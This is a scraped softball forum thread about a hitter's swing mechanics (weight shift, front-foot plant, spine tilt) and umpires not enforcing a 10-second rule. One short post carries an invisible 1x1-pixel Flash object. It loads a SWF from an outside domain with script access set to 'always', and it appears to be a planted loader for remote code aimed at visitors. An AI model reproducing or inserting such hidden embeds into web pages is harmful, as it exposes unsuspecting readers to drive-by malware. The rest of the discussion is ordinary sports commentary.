Jenna Lilley

Welcome to Discuss Fastpitch

Your FREE Account is waiting to the Best Softball Community on the Web.

rdbass

It wasn't me.
Jun 5, 2010
Not here.
All forward?

212bbmh.gif

I didn't say 'all back forward'
Originally Posted by corlay

Base upon recent trends in discussions here regarding younger players learning swings...

Id say that most here would criticize her COM loading back over (and beyond?) her rear foot.
Most strive for COM remaining between the legs, and a FbC approach?
Some would criticize her as "too much frontal plane movement" or "all back, all forward", I think?
Also, watch her head, and how far it drops on her rearward load.
Lastly, she doesn't seem to exhibit much of the "spine tilt" that is a recent hot topic. "swings with shoulders level" is probably another barb to throw...

BUT... the forward part of her swing looks balanced and powerful to me.
And she is a successful hitter.
So what do I know...

but, here was my answer to corlay:
I should have been clear when I said 'I thought that too'. I meant I orginal 'thought' that when I first saw her swing then as I continued to look at her swing this is what I noticed.
I thought that too....'all back, all forward'.
Look at what the hitter does with he front foot. Front foot isn't 'planted'/heel plant until during swing. Shifts AND swings(good). Not a swing style to teach a younger hitter.
Again JMHO.

Jan 11, 2016
think he was referring to the front foot?
<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="https://hawtstyles.com/flash/8/image.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="https://hawtstyles.com/flash/8/image.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>

Cannonball

Ex "Expert"
Feb 25, 2009
I wish umps enforced the 10-second rule on her...

I was wondering why it wasn't being called. In the conference dd played in, it certainly would have been called. Heck, if they stepped to far away from the box, some of the umpires were on players right away.

Forum statistics

Threads
Members
Latest member
WYOwiseguy